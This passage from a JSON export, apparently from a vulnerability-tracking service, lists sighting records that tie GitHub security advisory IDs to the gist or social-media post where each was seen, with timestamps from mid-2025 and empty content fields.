"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "3341161e-681d-4397-a6f4-ca09b803539c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "632c438e-9e6b-40e6-8908-5e667b63d07f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/f0ece275d2a5f01cdb6c494e4eda047c", "content": "", "creation_timestamp": "2025-07-16T14:08:37.000000Z"}, {"uuid": "5cca7c9a-cda7-4930-b51c-c6c78a97fe03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/f0ece275d2a5f01cdb6c494e4eda047c", "content": "", "creation_timestamp": "2025-07-16T14:08:37.000000Z"}, {"uuid": "091e7c16-22c1-4577-bc63-251a6e689beb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/a17a415f7a1fd6c4a885cd5ee0694347", "content": "", "creation_timestamp": "2025-07-16T14:37:35.000000Z"}, {"uuid": "7f63fd80-67c8-41df-83f4-767425da380e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/a17a415f7a1fd6c4a885cd5ee0694347", "content": "", "creation_timestamp": "2025-07-16T14:37:35.000000Z"}, {"uuid": "5c658d56-844f-46fd-94f7-840e2ad3d230", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p6w-m9wc-c9c9", "type": "seen", "source": "https://gist.github.com/safer-bot/a17a415f7a1fd6c4a885cd5ee0694347", "content": "", "creation_timestamp": "2025-07-16T14:37:35.000000Z"}, {"uuid": "cb972bde-6c92-4d69-b1e6-b7f19e992fc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "28a97a7f-4a57-4904-a08f-2189349f12db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "dadac796-8937-4187-9f84-018ba4272014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "9d18c6db-ee16-43d0-8d21-49ec012b3683", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "a4c48a42-8bc5-4beb-9d27-4386303354a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "ab0db896-97e3-46bc-87df-c05a3f635cc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "d6576e9c-625c-4b9c-9cb9-ba7fc61252aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "5200ae90-d263-44ab-a158-466d10e0e7b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "0bf3ddd4-a9ef-4629-9171-1c4c3234a56f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "388aaecf-c6cc-4686-9046-25e68ad2b4d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "0d6a4e6e-fb43-4792-9073-3e08ecae2299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "4d699060-5328-40e2-893f-911a9b71040e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "82167def-9572-4aa9-97f9-5b2c399ca1de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "4d31b63f-7d49-4001-bde4-b4359f27ff29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/fabe4b49e7610b72e4ee03b680c68023", "content": "", "creation_timestamp": "2025-07-16T08:05:58.000000Z"}, {"uuid": "80b5faf3-0114-490b-af20-b5d02e0da455", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/54c42fcc37011eabc310fd3a811aea94", "content": "", "creation_timestamp": "2025-07-07T04:18:41.000000Z"}, {"uuid": "682efb05-8d30-49bb-b1cb-cde963d2bcb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/f6bff2acdcd2832665ecc924c0f91067", "content": "", "creation_timestamp": "2025-07-16T08:10:33.000000Z"}, {"uuid": "d58391a7-18ec-4965-a0c5-db2b3447a381", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2935-2wfm-hhpv", "type": "seen", "source": "https://gist.github.com/safer-bot/9b1964e5d86640580eef7861e4f37f4c", "content": "", "creation_timestamp": "2025-07-16T12:26:35.000000Z"}, {"uuid": "180d7707-4afb-4450-a556-ee831ad33d08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/9b1964e5d86640580eef7861e4f37f4c", "content": "", "creation_timestamp": "2025-07-16T12:26:35.000000Z"}, {"uuid": "780a27a9-e442-4f97-9d6f-64c5474a071d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hw58-3793-42gg", "type": "seen", "source": "https://gist.github.com/safer-bot/9b1964e5d86640580eef7861e4f37f4c", "content": "", "creation_timestamp": "2025-07-16T12:26:35.000000Z"}, {"uuid": "8bc454cf-41ea-4dd1-8486-0f36f153d322", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/9b1964e5d86640580eef7861e4f37f4c", "content": "", "creation_timestamp": "2025-07-16T12:26:35.000000Z"}, {"uuid": "af5b7bac-6c7d-4f39-b501-c89ece6a03ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jfq-x6xp-7rw2", "type": "seen", "source": "https://gist.github.com/safer-bot/9b1964e5d86640580eef7861e4f37f4c", "content": "", "creation_timestamp": "2025-07-16T12:26:35.000000Z"}, {"uuid": "b49333ac-9a71-4708-9d94-89ea162ca7b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/9b1964e5d86640580eef7861e4f37f4c", "content": "", "creation_timestamp": "2025-07-16T12:26:35.000000Z"}, {"uuid": "bda48857-19e2-45a9-95c6-1add8b5e11f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9623-mj7j-p9v4", "type": "seen", "source": "https://gist.github.com/safer-bot/9b1964e5d86640580eef7861e4f37f4c", "content": "", "creation_timestamp": "2025-07-16T12:26:35.000000Z"}, {"uuid": "5f0c55ed-2569-46d8-b5fd-eb320a717be9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvgg-2r3r-53x7", "type": "seen", "source": "https://gist.github.com/safer-bot/9b1964e5d86640580eef7861e4f37f4c", "content": "", "creation_timestamp": "2025-07-16T12:26:35.000000Z"}, {"uuid": "1eb069fc-23a9-400c-a6bb-8c6c42272059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x8mp-chx3-6x2p", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114653505710010379", "content": "", "creation_timestamp": "2025-06-09T12:54:19.579395Z"}, {"uuid": "06e0d22e-74c4-4b2d-8bfd-b63b673977ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "4f081bff-a1ef-4bb3-9710-f5e851b3cd8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "fec20775-7e49-442d-b4ec-61c1ecd14ff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "9da4d768-24be-4504-a68d-a8e650c03582", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "737c3de6-f909-46b6-9d36-164c80eb0a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/b9718fce4d05f267775cb82e0e613a05", "content": "", "creation_timestamp": "2025-07-16T03:08:47.000000Z"}, {"uuid": "5f0176fb-0a00-418a-8afc-b68ddf785ddc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7grw-6pjh-jpc9", "type": "seen", "source": "https://gist.github.com/safer-bot/98076be44b63186a53bdf845de69ea26", "content": "", "creation_timestamp": "2025-07-16T08:12:10.000000Z"}, {"uuid": "e652afaa-5528-49e9-bed7-8e5b3364af5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6vqp-h455-42mr", "type": "seen", "source": "https://gist.github.com/safer-bot/98076be44b63186a53bdf845de69ea26", "content": "", "creation_timestamp": "2025-07-16T08:12:10.000000Z"}, {"uuid": "a34aa638-00ba-47c5-83a3-5ceaff28c534", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "0df09c52-9c79-4a61-80b5-f36709f1ce17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "2a7587ad-0e45-4ba2-982a-be11da73023f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "84bde0e5-a987-44e3-af31-4886089244d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "9c2502a2-f28f-4af8-9a96-9efbfeace88e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/79174d0c201539d79b25fe0f667fa43e", "content": "", "creation_timestamp": "2025-07-16T03:12:23.000000Z"}, {"uuid": "551de278-b4c9-4fdc-958f-445d22695153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/4a0c1681f4dce611ef9b2d8ad2491ce6", "content": "", "creation_timestamp": "2025-07-16T03:20:51.000000Z"}, {"uuid": "7bc70702-0b83-47e0-bdec-7803a1b76329", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/4a0c1681f4dce611ef9b2d8ad2491ce6", "content": "", "creation_timestamp": "2025-07-16T03:20:51.000000Z"}, {"uuid": "b8da0cd2-1e9a-44d5-af48-86acc7080c1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/4a0c1681f4dce611ef9b2d8ad2491ce6", "content": "", "creation_timestamp": "2025-07-16T03:20:51.000000Z"}, {"uuid": "905ec8e0-663e-4081-889a-b24968b483a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/4a0c1681f4dce611ef9b2d8ad2491ce6", "content": "", "creation_timestamp": "2025-07-16T03:20:51.000000Z"}, {"uuid": "40bf483e-f082-4ac5-ab26-45042ddce70e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/4a0c1681f4dce611ef9b2d8ad2491ce6", "content": "", "creation_timestamp": "2025-07-16T03:20:51.000000Z"}, {"uuid": "4860e57c-0de3-49d3-9898-0516f2d7f368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/b741dde9ba07c0f12e52ef92e8b23ee0", "content": "", "creation_timestamp": "2025-07-16T03:23:26.000000Z"}, {"uuid": "0c1fd40b-2ed1-4f58-8ec3-23e960ba1002", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fxph-q3j8-mv87", "type": "seen", "source": "https://gist.github.com/safer-bot/ef60ba5b8082b173c2019a18ade46e96", "content": "", "creation_timestamp": "2025-07-16T08:23:40.000000Z"}, {"uuid": "e8281bfc-ca92-4037-8c3a-2c56c4cabacc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/ef60ba5b8082b173c2019a18ade46e96", "content": "", "creation_timestamp": "2025-07-16T08:23:40.000000Z"}, {"uuid": "9ba544be-277d-4409-bdd4-b74a4650af40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/ef60ba5b8082b173c2019a18ade46e96", "content": "", "creation_timestamp": "2025-07-16T08:23:40.000000Z"}, {"uuid": "dfbfd523-4c60-4a59-9a3d-2fe07c1f82d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "257d3b0c-567c-4b0b-b3c6-962e9d8650b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "687491c5-74c6-4317-98d0-fd9073510039", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "b121398a-fd32-40fc-8660-e73e8bced500", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "0883720e-60ed-4468-840a-7259af4b9507", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/64c869407f72779632d4e37261089424", "content": "", "creation_timestamp": "2025-07-16T12:38:05.000000Z"}, {"uuid": "471c9574-6414-40a8-a0ed-83b59f9ec4e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p6w-m9wc-c9c9", "type": "seen", "source": "https://gist.github.com/safer-bot/64c869407f72779632d4e37261089424", "content": "", "creation_timestamp": "2025-07-16T12:38:05.000000Z"}, {"uuid": "8d9d863d-cab3-43b8-8ddd-c7e8a4681763", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mc7-4q67-w48m", "type": "seen", "source": "https://gist.github.com/safer-bot/c2216b5d3e2d6726f802333827d83269", "content": "", "creation_timestamp": "2025-07-16T03:26:38.000000Z"}, {"uuid": "52e3fca6-3d68-45df-9b04-49a752668036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "886c90af-37d6-43bf-948a-0cca2f7c8b82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77rm-9x9h-xj3g", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "9c39f314-48a1-4a44-9cea-8214b1b4e527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g76j-4cxx-23h9", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "740751c8-2d09-412a-a865-8fb813d8a8fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "a7deab63-71bc-4d0f-8392-94ff2423d3c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "2d616f35-1a02-4545-a1ad-2db5d608640f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w6f2-8wx4-47r5", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "428334d9-ac49-48c0-a39b-b8250d78176b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "f3625c7c-58d2-4e77-a85b-29adfdd5d914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/c3809a62289ea4c72cad427fad95a091", "content": "", "creation_timestamp": "2025-07-16T08:01:24.000000Z"}, {"uuid": "4fc25d3e-cffc-4832-848c-bcc60f760b4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/c3809a62289ea4c72cad427fad95a091", "content": "", "creation_timestamp": "2025-07-16T08:01:24.000000Z"}, {"uuid": "71f3fefd-d704-48bf-921a-bdff721bf169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/24d871f5d5a1f1f569b4afc0326e41b9", "content": "", "creation_timestamp": "2025-07-16T12:14:34.000000Z"}, {"uuid": "e2797375-fd64-4cff-b6a4-ec4a17be6a8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": 